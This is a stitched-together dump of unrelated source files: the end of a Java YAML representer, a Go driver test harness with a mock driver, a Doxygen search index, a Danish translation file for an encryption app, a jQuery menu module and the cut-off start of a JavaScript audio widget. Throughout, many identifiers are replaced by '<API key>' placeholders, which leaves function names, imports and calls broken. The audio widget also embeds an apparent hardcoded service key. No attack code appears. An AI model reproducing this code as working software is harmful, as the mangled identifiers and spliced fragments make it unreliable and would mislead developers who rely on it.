                return representSequence(Tag.SEQ, asByteList(data), null);
            }else if (short.class == type){
                return representSequence(Tag.SEQ, asShortList(data), null);
            }else if (int.class == type){
                return representSequence(Tag.SEQ, asIntList(data), null);
            }else if (long.class == type){
                return representSequence(Tag.SEQ, asLongList(data), null);
            }else if (float.class == type){
                return representSequence(Tag.SEQ, asFloatList(data), null);
            }else if (double.class == type){
                return representSequence(Tag.SEQ, asDoubleList(data), null);
            }else if (char.class == type){
                return representSequence(Tag.SEQ, asCharList(data), null);
            }else if (boolean.class == type){
                return representSequence(Tag.SEQ, asBooleanList(data), null);
            }
            throw new YAMLException("Unexpected primitive '" + type.getCanonicalName() + "'");
        }
        private List<Byte> asByteList(Object in){
            byte[] array = (byte[]) in;
            List<Byte> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Short> asShortList(Object in){
            short[] array = (short[]) in;
            List<Short> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Integer> asIntList(Object in){
            int[] array = (int[]) in;
            List<Integer> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Long> asLongList(Object in){
            long[] array = (long[]) in;
            List<Long> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Float> asFloatList(Object in){
            float[] array = (float[]) in;
            List<Float> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Double> asDoubleList(Object in){
            double[] array = (double[]) in;
            List<Double> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Character> asCharList(Object in){
            char[] array = (char[]) in;
            List<Character> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
        private List<Boolean> asBooleanList(Object in){
            boolean[] array = (boolean[]) in;
            List<Boolean> list = new ArrayList<>(array.length);
            for (int i = 0; i < array.length; ++i){
                list.add(array[i]);
            }
            return list;
        }
    }

    protected class RepresentMap implements Represent{
        @SuppressWarnings("unchecked")
        @Override
        public Node representData(Object data){
            return representMapping(getTag(data.getClass(), Tag.MAP), (Map<Object, Object>) data, null);
        }
    }

    // Represents a Set as a !!set mapping whose values are all null.
    protected class RepresentSet implements Represent{
        @SuppressWarnings("unchecked")
        @Override
        public Node representData(Object data){
            Map<Object, Object> value = new LinkedHashMap<>();
            Set<Object> set = (Set<Object>) data;
            for (Object key : set){
                value.put(key, null);
            }
            return representMapping(getTag(data.getClass(), Tag.SET), value, null);
        }
    }

    // Represents Date/Calendar values as YAML timestamps, e.g.
    // 2001-12-14T21:59:43.010Z (a trailing "Z" marks UTC, otherwise a
    // numeric offset is appended).
    protected class RepresentDate implements Represent{
        @Override
        public Node representData(Object data){
            Calendar calendar;
            if (data instanceof Calendar){
                calendar = (Calendar) data;
            }else{
                // Format in the configured dump time zone, defaulting to UTC.
                calendar = Calendar.getInstance(getTimeZone() == null ? TimeZone.getTimeZone("UTC") : timeZone);
                calendar.setTime((Date) data);
            }
            int years = calendar.get(Calendar.YEAR);
            int months = calendar.get(Calendar.MONTH) + 1; // 0..11 -> 1..12
            int days = calendar.get(Calendar.DAY_OF_MONTH);
            int hour24 = calendar.get(Calendar.HOUR_OF_DAY);
            int minutes = calendar.get(Calendar.MINUTE);
            int seconds = calendar.get(Calendar.SECOND);
            int millis = calendar.get(Calendar.MILLISECOND);
            // Zero-pad the year to four digits.
            StringBuilder buffer = new StringBuilder(String.valueOf(years));
            while (buffer.length() < 4){
                buffer.insert(0, "0");
            }
            buffer.append("-");
            if (months < 10){
                buffer.append("0");
            }
            buffer.append(String.valueOf(months));
            buffer.append("-");
            if (days < 10){
                buffer.append("0");
            }
            buffer.append(String.valueOf(days));
            buffer.append("T");
            if (hour24 < 10){
                buffer.append("0");
            }
            buffer.append(String.valueOf(hour24));
            buffer.append(":");
            if (minutes < 10){
                buffer.append("0");
            }
            buffer.append(String.valueOf(minutes));
            buffer.append(":");
            if (seconds < 10){
                buffer.append("0");
            }
            buffer.append(String.valueOf(seconds));
            // Milliseconds are only emitted when non-zero.
            if (millis > 0){
                if (millis < 10){
                    buffer.append(".00");
                }else if (millis < 100){
                    buffer.append(".0");
                }else{
                    buffer.append(".");
                }
                buffer.append(String.valueOf(millis));
            }
            if (TimeZone.getTimeZone("UTC").equals(calendar.getTimeZone())){
                buffer.append("Z");
            }else{
                int gmtOffset = calendar.getTimeZone().getOffset(calendar.get(Calendar.ERA), calendar.get(Calendar.YEAR), calendar.get(Calendar.MONTH), calendar.get(Calendar.DAY_OF_MONTH), calendar.get(Calendar.DAY_OF_WEEK), calendar.get(Calendar.MILLISECOND));
                int minutesOffset = gmtOffset / (60 * 1000);
                int hoursOffset = minutesOffset / 60;
                int partOfHour = minutesOffset % 60;
                // NOTE(review): for negative offsets partOfHour is negative,
                // so e.g. UTC-05:30 appears to render as "-5:0-30" — looks
                // like a bug; confirm against the YAML timestamp spec before
                // relying on non-UTC, non-whole-hour zones.
                buffer.append(hoursOffset > 0 ? "+" : "").append(hoursOffset).append(":").append(partOfHour < 10 ? "0" + partOfHour : partOfHour);
            }
            return representScalar(getTag(data.getClass(), Tag.TIMESTAMP), buffer.toString(), null);
        }
    }

    // Represents an enum constant by its name, tagged with the enum class.
    protected class RepresentEnum implements Represent{
        @Override
        public Node representData(Object data){
            Tag tag = new Tag(data.getClass());
            return representScalar(getTag(data.getClass(), tag), ((Enum<?>) data).name());
        }
    }

    // Represents byte[] as base64 !!binary in literal block style.
    protected class RepresentByteArray implements Represent{
        @Override
        public Node representData(Object data){
            char[] binary = Base64Coder.encode((byte[]) data);
            return representScalar(Tag.BINARY, String.valueOf(binary), '|');
        }
    }

    /** @return the time zone used when dumping dates, or null for UTC */
    public TimeZone getTimeZone(){
        return timeZone;
    }

    /** Sets the time zone used when dumping dates; null means UTC. */
    public void setTimeZone(TimeZone timeZone){
        this.timeZone = timeZone;
    }

    // Represents a UUID by its canonical string form.
    protected class RepresentUuid implements Represent{
        @Override
        public Node representData(Object data){
            return representScalar(getTag(data.getClass(), new Tag(UUID.class)), data.toString());
        }
    }
}
package testutils
import (
"context"
"fmt"
"io/ioutil"
"path/filepath"
"runtime"
"strings"
"time"
testing "github.com/mitchellh/<API key>"
hclog "github.com/hashicorp/go-hclog"
plugin "github.com/hashicorp/go-plugin"
"github.com/hashicorp/nomad/client/allocdir"
"github.com/hashicorp/nomad/client/config"
"github.com/hashicorp/nomad/client/logmon"
"github.com/hashicorp/nomad/client/taskenv"
"github.com/hashicorp/nomad/helper/testlog"
"github.com/hashicorp/nomad/helper/uuid"
"github.com/hashicorp/nomad/nomad/mock"
"github.com/hashicorp/nomad/nomad/structs"
"github.com/hashicorp/nomad/plugins/base"
"github.com/hashicorp/nomad/plugins/drivers"
"github.com/hashicorp/nomad/plugins/shared/hclspec"
"github.com/stretchr/testify/require"
)
// DriverHarness wraps a driver plugin for testing: calls made through the
// embedded DriverPlugin travel over a real, in-process gRPC client/server
// pair, exercising the plugin serialization layer end to end.
type DriverHarness struct {
	drivers.DriverPlugin

	// client/server are the in-process gRPC plugin endpoints; both are
	// shut down by Kill.
	client *plugin.GRPCClient
	server *plugin.GRPCServer

	// t receives fatal setup errors.
	t testing.T

	logger hclog.Logger

	// impl is the raw driver implementation, reachable without the gRPC
	// round trip via Impl().
	impl drivers.DriverPlugin
}
// Impl returns the underlying driver implementation the harness was created
// with, bypassing the gRPC plugin round trip.
func (h *DriverHarness) Impl() drivers.DriverPlugin {
	return h.impl
}
// NewDriverHarness wires the given driver implementation into an in-process
// gRPC plugin client/server pair (together with base and logmon plugins) and
// returns a harness whose DriverPlugin methods go through the full plugin
// round trip. Setup failures abort the test via t.Fatalf.
func NewDriverHarness(t testing.T, d drivers.DriverPlugin) *DriverHarness {
	logger := testlog.HCLogger(t).Named("driver_harness")

	// Serve the driver (plus companions) over an in-memory gRPC connection.
	pluginSet := map[string]plugin.Plugin{
		base.PluginTypeDriver: drivers.NewDriverPlugin(d, logger),
		base.PluginTypeBase:   &base.PluginBase{Impl: d},
		"logmon":              logmon.NewPlugin(logmon.NewLogMon(logger.Named("logmon"))),
	}
	client, server := plugin.TestPluginGRPCConn(t, pluginSet)

	raw, err := client.Dispense(base.PluginTypeDriver)
	if err != nil {
		t.Fatalf("err dispensing plugin: %v", err)
	}

	return &DriverHarness{
		DriverPlugin: raw.(drivers.DriverPlugin),
		client:       client,
		server:       server,
		t:            t,
		logger:       logger,
		impl:         d,
	}
}
// Kill tears down the in-process plugin connection, closing the client side
// first and then stopping the gRPC server.
func (h *DriverHarness) Kill() {
	h.client.Close()
	h.server.Stop()
}
// tinyChroot is useful for testing, where we do not use anything other than
// trivial /bin commands like sleep and sh.
// Note that you cannot chroot a symlink.
// Keys are host paths to map into the chroot; values are their destination
// paths inside it.
var tinyChroot = map[string]string{
	// destination: /bin
	"/usr/bin/sleep": "/bin/sleep",
	"/usr/bin/dash":  "/bin/sh",
	"/usr/bin/bash":  "/bin/bash",
	"/usr/bin/cat":   "/bin/cat",

	// destination: /usr/bin
	"/usr/bin/stty":   "/usr/bin/stty",
	"/usr/bin/head":   "/usr/bin/head",
	"/usr/bin/mktemp": "/usr/bin/mktemp",
	"/usr/bin/echo":   "/usr/bin/echo",
	"/usr/bin/touch":  "/usr/bin/touch",
	"/usr/bin/stat":   "/usr/bin/stat",

	// destination: /etc/
	"/etc/ld.so.cache":  "/etc/ld.so.cache",
	"/etc/ld.so.conf":   "/etc/ld.so.conf",
	"/etc/ld.so.conf.d": "/etc/ld.so.conf.d",
	"/etc/passwd":       "/etc/passwd",
	"/etc/resolv.conf":  "/etc/resolv.conf",

	// others
	"/lib":                 "/lib",
	"/lib32":               "/lib32",
	"/lib64":               "/lib64",
	"/usr/lib/jvm":         "/usr/lib/jvm",
	"/run/resolvconf":      "/run/resolvconf",
	"/run/systemd/resolve": "/run/systemd/resolve",
}
// MkAllocDir creates a temporary directory and allocdir structure.
// If enableLogs is set to true a logmon instance will be started to write logs
// to the LogDir of the task.
// A cleanup func is returned and should be deferred so as to not leak dirs
// between tests. The TaskConfig is mutated in place (AllocDir, Env, and —
// when logging — StdoutPath/StderrPath are filled in).
func (h *DriverHarness) MkAllocDir(t *drivers.TaskConfig, enableLogs bool) func() {
	// Build the allocation directory tree on disk.
	dir, err := ioutil.TempDir("", "<API key>-")
	require.NoError(h.t, err)
	allocDir := allocdir.NewAllocDir(h.logger, dir, t.AllocID)
	require.NoError(h.t, allocDir.Build())
	t.AllocDir = allocDir.AllocDir

	// Build the task directory, chrooted only when the driver requires
	// chroot isolation.
	taskDir := allocDir.NewTaskDir(t.Name)
	caps, err := h.Capabilities()
	require.NoError(h.t, err)
	fsi := caps.FSIsolation
	require.NoError(h.t, taskDir.Build(fsi == drivers.FSIsolationChroot, tinyChroot))

	task := &structs.Task{
		Name: t.Name,
		Env:  t.Env,
	}

	// Create the mock allocation
	alloc := mock.Alloc()
	if t.Resources != nil {
		alloc.AllocatedResources.Tasks[task.Name] = t.Resources.NomadResources
	}
	taskBuilder := taskenv.NewBuilder(mock.Node(), alloc, task, "global")
	SetEnvvars(taskBuilder, fsi, taskDir, config.DefaultConfig())

	// Merge the derived task environment into the config without
	// overwriting values the caller set explicitly.
	taskEnv := taskBuilder.Build()
	if t.Env == nil {
		t.Env = taskEnv.Map()
	} else {
		for k, v := range taskEnv.Map() {
			if _, ok := t.Env[k]; !ok {
				t.Env[k] = v
			}
		}
	}

	//logmon
	if enableLogs {
		lm := logmon.NewLogMon(h.logger.Named("logmon"))
		if runtime.GOOS == "windows" {
			// Windows cannot use fifos; stream through named pipes instead.
			id := uuid.Generate()[:8]
			t.StdoutPath = fmt.Sprintf("//./pipe/%s-%s.stdout", t.Name, id)
			t.StderrPath = fmt.Sprintf("//./pipe/%s-%s.stderr", t.Name, id)
		} else {
			t.StdoutPath = filepath.Join(taskDir.LogDir, fmt.Sprintf(".%s.stdout.fifo", t.Name))
			t.StderrPath = filepath.Join(taskDir.LogDir, fmt.Sprintf(".%s.stderr.fifo", t.Name))
		}
		err = lm.Start(&logmon.LogConfig{
			LogDir:        taskDir.LogDir,
			StdoutLogFile: fmt.Sprintf("%s.stdout", t.Name),
			StderrLogFile: fmt.Sprintf("%s.stderr", t.Name),
			StdoutFifo:    t.StdoutPath,
			StderrFifo:    t.StderrPath,
			MaxFiles:      10,
			MaxFileSizeMB: 10,
		})
		require.NoError(h.t, err)
		return func() {
			lm.Stop()
			h.client.Close()
			allocDir.Destroy()
		}
	}
	return func() {
		h.client.Close()
		allocDir.Destroy()
	}
}
// WaitUntilStarted will block until the task for the given ID is in the
// running state or the timeout is reached, polling InspectTask every 100ms.
// Inspection errors are returned immediately.
func (h *DriverHarness) WaitUntilStarted(taskID string, timeout time.Duration) error {
	deadline := time.Now().Add(timeout)
	var observed drivers.TaskState
	for {
		status, err := h.InspectTask(taskID)
		if err != nil {
			return err
		}
		observed = status.State
		if observed == drivers.TaskStateRunning {
			return nil
		}
		if time.Now().After(deadline) {
			return fmt.Errorf("task never transitioned to running, currently '%s'", observed)
		}
		time.Sleep(100 * time.Millisecond)
	}
}
// MockDriver is used for testing.
// Each function can be set as a closure to make assertions about how data
// is passed through the base plugin layer. A method whose closure is left
// nil will panic when invoked.
type MockDriver struct {
	base.MockPlugin

	// One closure per drivers.DriverPlugin method.
	TaskConfigSchemaF  func() (*hclspec.Spec, error)
	FingerprintF       func(context.Context) (<-chan *drivers.Fingerprint, error)
	CapabilitiesF      func() (*drivers.Capabilities, error)
	RecoverTaskF       func(*drivers.TaskHandle) error
	StartTaskF         func(*drivers.TaskConfig) (*drivers.TaskHandle, *drivers.DriverNetwork, error)
	WaitTaskF          func(context.Context, string) (<-chan *drivers.ExitResult, error)
	StopTaskF          func(string, time.Duration, string) error
	DestroyTaskF       func(string, bool) error
	InspectTaskF       func(string) (*drivers.TaskStatus, error)
	TaskStatsF         func(context.Context, string, time.Duration) (<-chan *drivers.TaskResourceUsage, error)
	TaskEventsF        func(context.Context) (<-chan *drivers.TaskEvent, error)
	SignalTaskF        func(string, string) error
	ExecTaskF          func(string, []string, time.Duration) (*drivers.ExecTaskResult, error)
	ExecTaskStreamingF func(context.Context, string, *drivers.ExecOptions) (*drivers.ExitResult, error)

	// Embedded so MockDriver also satisfies the network manager interface.
	MockNetworkManager
}
// MockNetworkManager stubs network creation/teardown with caller-supplied
// closures, mirroring the MockDriver pattern.
type MockNetworkManager struct {
	CreateNetworkF  func(string, *drivers.<API key>) (*drivers.<API key>, bool, error)
	DestroyNetworkF func(string, *drivers.<API key>) error
}
// CreateNetwork delegates to the CreateNetworkF closure (panics if nil).
func (m *MockNetworkManager) CreateNetwork(allocID string, req *drivers.<API key>) (*drivers.<API key>, bool, error) {
	return m.CreateNetworkF(allocID, req)
}
// DestroyNetwork delegates to the DestroyNetworkF closure (panics if nil).
func (m *MockNetworkManager) DestroyNetwork(id string, spec *drivers.<API key>) error {
	return m.DestroyNetworkF(id, spec)
}
// The methods below complete MockDriver's drivers.DriverPlugin
// implementation by forwarding every call to the matching closure field.
// Leaving a closure nil makes the corresponding call panic, which quickly
// surfaces unconfigured expectations in tests.

func (d *MockDriver) TaskConfigSchema() (*hclspec.Spec, error) { return d.TaskConfigSchemaF() }

func (d *MockDriver) Fingerprint(ctx context.Context) (<-chan *drivers.Fingerprint, error) {
	return d.FingerprintF(ctx)
}

func (d *MockDriver) Capabilities() (*drivers.Capabilities, error) { return d.CapabilitiesF() }

func (d *MockDriver) RecoverTask(h *drivers.TaskHandle) error { return d.RecoverTaskF(h) }

func (d *MockDriver) StartTask(c *drivers.TaskConfig) (*drivers.TaskHandle, *drivers.DriverNetwork, error) {
	return d.StartTaskF(c)
}

func (d *MockDriver) WaitTask(ctx context.Context, id string) (<-chan *drivers.ExitResult, error) {
	return d.WaitTaskF(ctx, id)
}

func (d *MockDriver) StopTask(taskID string, timeout time.Duration, signal string) error {
	return d.StopTaskF(taskID, timeout, signal)
}

func (d *MockDriver) DestroyTask(taskID string, force bool) error {
	return d.DestroyTaskF(taskID, force)
}

func (d *MockDriver) InspectTask(taskID string) (*drivers.TaskStatus, error) {
	return d.InspectTaskF(taskID)
}

func (d *MockDriver) TaskStats(ctx context.Context, taskID string, i time.Duration) (<-chan *drivers.TaskResourceUsage, error) {
	return d.TaskStatsF(ctx, taskID, i)
}

func (d *MockDriver) TaskEvents(ctx context.Context) (<-chan *drivers.TaskEvent, error) {
	return d.TaskEventsF(ctx)
}

func (d *MockDriver) SignalTask(taskID string, signal string) error {
	return d.SignalTaskF(taskID, signal)
}

func (d *MockDriver) ExecTask(taskID string, cmd []string, timeout time.Duration) (*drivers.ExecTaskResult, error) {
	return d.ExecTaskF(taskID, cmd, timeout)
}

func (d *MockDriver) ExecTaskStreaming(ctx context.Context, taskID string, execOpts *drivers.ExecOptions) (*drivers.ExitResult, error) {
	return d.ExecTaskStreamingF(ctx, taskID, execOpts)
}
// SetEnvvars sets path and host env vars depending on the FS isolation used.
// Host-side paths are always recorded; the task-visible alloc/local/secrets
// paths switch between host and in-container locations based on fsi.
func SetEnvvars(envBuilder *taskenv.Builder, fsi drivers.FSIsolation, taskDir *allocdir.TaskDir, conf *config.Config) {
	// Client-side (host) paths always point at the real on-disk locations.
	envBuilder.SetClientTaskRoot(taskDir.Dir)
	envBuilder.<API key>(taskDir.SharedAllocDir)
	envBuilder.<API key>(taskDir.LocalDir)
	envBuilder.<API key>(taskDir.SecretsDir)

	// Set driver-specific environment variables
	switch fsi {
	case drivers.FSIsolationNone:
		// Use host paths
		envBuilder.SetAllocDir(taskDir.SharedAllocDir)
		envBuilder.SetTaskLocalDir(taskDir.LocalDir)
		envBuilder.SetSecretsDir(taskDir.SecretsDir)
	default:
		// filesystem isolation; use container paths
		envBuilder.SetAllocDir(allocdir.<API key>)
		envBuilder.SetTaskLocalDir(allocdir.<API key>)
		envBuilder.SetSecretsDir(allocdir.<API key>)
	}

	// Set the host environment variables for non-image based drivers
	if fsi != drivers.FSIsolationImage {
		// COMPAT(1.0) using inclusive language, blacklist is kept for backward compatibility.
		filter := strings.Split(conf.<API key>(
			[]string{"env.denylist", "env.blacklist"},
			config.DefaultEnvDenylist,
		), ",")
		envBuilder.SetHostEnvvars(filter)
	}
}
// Generated Doxygen search-index fragment: each entry maps a lowercased
// search key to its display name and the documentation page/anchor it links
// to. Do not edit by hand — regenerate with Doxygen instead.
var searchData=
[
  ['<API key>',['<API key>',['../<API key>.html#<API key>',1,'pathpy::MultiOrderModel::MultiOrderModel']]],
  ['totaledgeweight',['totalEdgeWeight',['../<API key>.html#<API key>',1,'pathpy::HigherOrderNetwork::HigherOrderNetwork']]]
];
// Danish (da) translation catalogue for the "encryption" app.
// Maps English source strings to their translations; the trailing argument
// is the gettext plural-forms rule.
// Fixes: "Gendannalsesnøgle" -> "Gendannelsesnøgle" (misspelling),
// "kryptere" -> "dekryptere" for "Can not decrypt ..." (mistranslation),
// "Nuvrende" -> "Nuværende" (missing æ).
OC.L10N.register(
    "encryption",
    {
    "Missing recovery key password" : "Der mangler kodeord for gendannelsesnøgle",
    "Please repeat the recovery key password" : "Gentag venligst kodeordet for gendannelsesnøglen",
    "Repeated recovery key password does not match the provided recovery key password" : "Det gentagne kodeord for gendannelsesnøglen stemmer ikke med det angivne kodeord for gendannelsesnøglen",
    "Recovery key successfully enabled" : "Gendannelsesnøgle aktiveret med succes",
    "Could not enable recovery key. Please check your recovery key password!" : "Kunne ikke aktivere gendannelsesnøgle. Kontroller venligst dit gendannelsesnøgle kodeord!",
    "Recovery key successfully disabled" : "Gendannelsesnøgle deaktiveret succesfuldt",
    "Could not disable recovery key. Please check your recovery key password!" : "Kunne ikke deaktivere gendannelsesnøgle. Kontroller din gendannelsesnøgle kodeord!",
    "Missing parameters" : "Manglende parametre",
    "Please provide the old recovery password" : "Angiv venligst det gamle kodeord for gendannelsesnøglen",
    "Please provide a new recovery password" : "Angiv venligst et nyt kodeord til gendannelse",
    "Please repeat the new recovery password" : "Gentag venligst det nye kodeord til gendannelse",
    "Password successfully changed." : "Kodeordet blev ændret succesfuldt",
    "Could not change the password. Maybe the old password was not correct." : "Kunne ikke ændre kodeordet. Måske var det gamle kodeord ikke korrekt.",
    "Recovery Key disabled" : "Gendannelsesnøgle er slået fra",
    "Recovery Key enabled" : "Gendannelsesnøgle aktiv",
    "Could not enable the recovery key, please try again or contact your administrator" : "Kunne ikke aktivere gendannelsesnøglen, venligst prøv igen eller kontakt din administrator",
    "Could not update the private key password." : "Kunne ikke opdatere kodeordet til den private nøgle.",
    "The old password was not correct, please try again." : "Det gamle kodeord var ikke korrekt, prøv venligst igen.",
    "The current log-in password was not correct, please try again." : "Det nuværende kodeord til log-in var ikke korrekt, prøv venligst igen.",
    "Private key password successfully updated." : "Privat nøgle kodeord succesfuldt opdateret.",
    "You need to migrate your encryption keys from the old encryption (ownCloud <= 8.0) to the new one. Please run 'occ encryption:migrate' or contact your administrator" : "Du skal overflytte dine krypteringsnøgler fra den gamle kryptering (ownCloud <= 8.0) til den nye af slagsen. Kør venligst \"occ encryption:migrate\" eller kontakt din administrator.",
    "Invalid private key for Encryption App. Please update your private key password in your personal settings to recover access to your encrypted files." : "Ugyldig privat nøgle for <API key>. Opdater venligst dit kodeord for den private nøgle i dine personlige indstillinger. Det kræves for at få adgang til dine krypterede filer.",
    "Encryption App is enabled and ready" : "App til kryptering er slået til og er klar",
    "Bad Signature" : "Ugyldig signatur",
    "Missing Signature" : "Signatur mangler",
    "one-time password for <API key>" : "Engangs password for kryptering på serverdelen",
    "Can not decrypt this file, probably this is a shared file. Please ask the file owner to reshare the file with you." : "Kan ikke dekryptere denne fil, sandsynligvis fordi filen er delt. Bed venligst filens ejer om at dele den med dig på ny.",
    "Can not read this file, probably this is a shared file. Please ask the file owner to reshare the file with you." : "Kan ikke læse denne fil, sandsynligvis fordi det er en delt fil. Bed venligst ejeren af filen om at dele filen med dig på ny.",
    "Hey there,\n\nthe admin enabled <API key>. Your files were encrypted using the password '%s'.\n\nPlease login to the web interface, go to the section 'ownCloud basic encryption module' of your personal settings and update your encryption password by entering this password into the 'old log-in password' field and your current login-password.\n\n" : "Hejsa,\n\nadministrator aktiveret kryptering på serverdelen. '%s'.\n\nVenligst log på web brugerfladen, gå til sektionen \"ownCloud grundlæggende krypterings modul\" for din personlige opsætninger og opdater dine krypterings kodeord ved at indtaste dette kodeord i \"gamle kodeord log\" feltet samt dit nuværende kodeord.\n\n",
    "The share will expire on %s." : "Delingen vil udløbe om %s.",
    "Cheers!" : "Hej!",
    "Hey there,<br><br>the admin enabled <API key>. Your files were encrypted using the password <strong>%s</strong>.<br><br>Please login to the web interface, go to the section \"ownCloud basic encryption module\" of your personal settings and update your encryption password by entering this password into the \"old log-in password\" field and your current login-password.<br><br>" : "Hejsa,<br><br>administrator aktiveret kryptering på serverdelen. Dine file er blevet krypteret med kodeordet <strong>%s</strong>.<br><br>Venligst log på web brugerfladen, gå til sektionen \"ownCloud grundlæggende krypterings modul\" for din personlige opsætninger og opdater dine krypterings kodeord ved at indtaste dette kodeord i \"gamle kodeord log\" feltet samt dit nuværende kodeord.<br><br>",
    "Encryption" : "Kryptering",
    "Encryption App is enabled but your keys are not initialized, please log-out and log-in again" : "<API key> er aktiveret, men din nøgler er ikke igangsat. Log venligst ud og ind igen.",
    "Encrypt the home storage" : "Krypter hjemmelageret",
    "Enabling this option encrypts all files stored on the main storage, otherwise only files on external storage will be encrypted" : "Ved at slå denne valgmulighed til krypteres alle filer i hovedlageret, ellers vil kun filer på eksternt lager blive krypteret",
    "Enable recovery key" : "Aktivér gendannelsesnøgle",
    "Disable recovery key" : "Deaktivér gendannelsesnøgle",
    "The recovery key is an extra encryption key that is used to encrypt files. It allows recovery of a user's files if the user forgets his or her password." : "Gendannelsesnøglen er en ekstra krypteringsnøgle, der bruges til at kryptere filer. Den tillader gendannelse af en brugers filer, hvis brugeren glemmer sin adgangskode.",
    "Recovery key password" : "Gendannelsesnøgle kodeord",
    "Repeat recovery key password" : "Gentag adgangskode for gendannelsesnøgle",
    "Change recovery key password:" : "Skift gendannelsesnøgle kodeord:",
    "Old recovery key password" : "Gammel adgangskode for gendannelsesnøgle",
    "New recovery key password" : "Ny adgangskode for gendannelsesnøgle",
    "Repeat new recovery key password" : "Gentag ny adgangskode for gendannelsesnøgle",
    "Change Password" : "Skift Kodeord",
    "ownCloud basic encryption module" : "ownCloud basis krypteringsmodul",
    "Your private key password no longer matches your log-in password." : "Dit private nøglekodeord stemmer ikke længere overens med dit login-kodeord.",
    "Set your old private key password to your current log-in password:" : "Sæt dit gamle, private nøglekodeord til at være dit nuværende login-kodeord. ",
    " If you don't remember your old password you can ask your administrator to recover your files." : "Hvis du ikke kan huske dit gamle kodeord kan du bede din administrator om at gendanne dine filer.",
    "Old log-in password" : "Gammelt login kodeord",
    "Current log-in password" : "Nuværende login kodeord",
    "Update Private Key Password" : "Opdater Privat Nøgle Kodeord",
    "Enable password recovery:" : "Aktiver kodeord gendannelse:",
    "Enabling this option will allow you to reobtain access to your encrypted files in case of password loss" : "Aktivering af denne valgmulighed tillader dig at generhverve adgang til dine krypterede filer i tilfælde af tab af kodeord",
    "Enabled" : "Aktiveret",
    "Disabled" : "Deaktiveret"
},
"nplurals=2; plural=(n != 1);");
define([
'backbone',
'jquery',
'jqueryui'
], function (
) {
'use strict';
/* Initialise the menus and associated events */
var $el = $("#jumper_menu");
var this_view = null;
$el.menu({
select: <API key>
});
function show_menu(view) {
if(!view) {
console.log("show_menu called without passing a view");
}
this_view = view;
$el.menu("collapseAll", null, true);
<API key>();
$el.show().position({
my: "left top",
at: "left bottom",
of: view.$el.find('.jumper_menu_button'),
collision: "fit flip"
});
/* Clicking outside the menu closes it */
$(document).on("click", hide_menu);
$(document).on("keypress", hide_menu);
}
function hide_menu() {
$el.hide();
$(document).off("click");
$(document).off("keypress");
}
function <API key>() {
<API key>(
"clear",
this_view.model.id
);
<API key>(
"jumper_to_here",
<API key>()
);
<API key>(
"show_destination",
this_view.model.id
);
}
function <API key>() {
/* Returns true if this is valid as a "jumper to here" destination.
* Note this only allows us to jumper within the same frame.
*/
return (
sessionStorage.<API key> &&
(sessionStorage.<API key> != this_view.model.circuit.id) &&
sessionStorage.<API key> &&
(sessionStorage.<API key> == this_view.model.circuit.get("frame_id"))
);
}
function <API key>(action, t) {
var selector = "li[data-action='" + action + "']";
var elements = $el.find(selector);
if(t) {
elements.removeClass("ui-state-disabled");
}
else {
elements.addClass("ui-state-disabled");
}
}
function <API key>(e, jq_element) {
e.stopPropagation();
console.log(e.currentTarget.dataset.action, "action clicked");
hide_menu();
switch(e.currentTarget.dataset.action) {
case "clear" :
this_view.jumper_remove();
break;
case "jumper_from_here" :
jumper_from_here();
break;
case "jumper_to_here" :
jumper_to_here();
break;
case "show_destination" :
this_view.trigger("show_destination");
break;
}
}
function jumper_from_here() {
console.log("setting jumper source to:", this_view.model.circuit.id);
sessionStorage.<API key> = this_view.model.circuit.id;
sessionStorage.<API key> = this_view.model.circuit.get("frame_id");
}
function jumper_to_here() {
this_view.trigger("add_jumper", {
circuit_id: this_view.model.circuit.id,
jumper_id: this_view.model.id,
<API key>: sessionStorage.<API key>
});
sessionStorage.removeItem("<API key>");
sessionStorage.removeItem("<API key>");
}
console.log("loaded jumper_menu.js");
return {
show: show_menu
};
}); |
function loadUTAudio() {
// DEPENDENCIES
//loadJPlayer();
//loadUTAudioEngine();
UT.import('jPlayer');
UT.import('utAudioEngine');
(function ($) {
"use strict";
var methods = {
<API key>: -1,
init: function(options) {
this.each(function() {
var $that = $(this);
var that = {};
this.utAudio = that;
var events = {
ready: "utAudio:ready",
change: "utAudio:change",
buttonClick: "utAudio:buttonClick",
mediaAdd: "utAudio:mediaAdd",
mediaRemove: "utAudio:mediaRemove",
mediaReady: "utAudio:mediaReady",
timeUpdate: "utAudio:timeUpdate",
play: "utAudio:play",
pause: "utAudio:pause",
stop: "utAudio:stop",
finish: "utAudio:finish",
seek: "utAudio:seek",
error: "utAudio:error",
dialogOpen: "utAudio:dialogOpen",
dialogCancel: "utAudio:dialogCancel"
};
var defaults = {
data: undefined,
skin: 'bottom-over',
id: false,
ui: {
play: true,
progress:true,
time: true,
title: true,
source: true,
artwork: true
},
styles: {
autoPause: true,
listenMedia: true,
staticLink: false
},
editable: true,
i18n: {
add: "add sound",
change: "",
error: "Error occurred",
dialogLabel: undefined
}
};
if(!that.post && UT && UT.Expression && UT.Expression.ready){
UT.Expression.ready(function(post){
that.post = post;
if(that.initialized) {
setTimeout(function() {
that.update();
$that.trigger(events.ready, {id:that.options.id, data:that.options.data});
}, 0);
that.addMediaListener();
}
});
}
that.options = $.extend(true, defaults, options);
that.isTouch = (('ontouchstart' in window) || (window.navigator.msMaxTouchPoints > 0));
that.sckey = 'T8Yki6U2061gLUkWvLA';
that.<API key> = false;
that.eventNS = '';
that.storageNS = 'utAudio_';
that.stateNS = "ut-audio-state";
that.editableNS= "ut-audio-editable";
that.uiNS = "ut-audio-ui";
that.modeNS = "ut-audio-mode";
that.skinNS = "ut-audio-skin";
that.serviceNS = "ut-audio-service";
that.aspectNS = "ut-audio-aspect";
that.sizeNS = "ut-audio-size";
that.touchNS = "ut-audio-touch";
if(that.options.ui === false || that.options.ui === true){
var v = that.options.ui;
that.options.ui = {
play: v,
progress:v,
time: v,
title: v,
source: v,
artwork: v
};
}
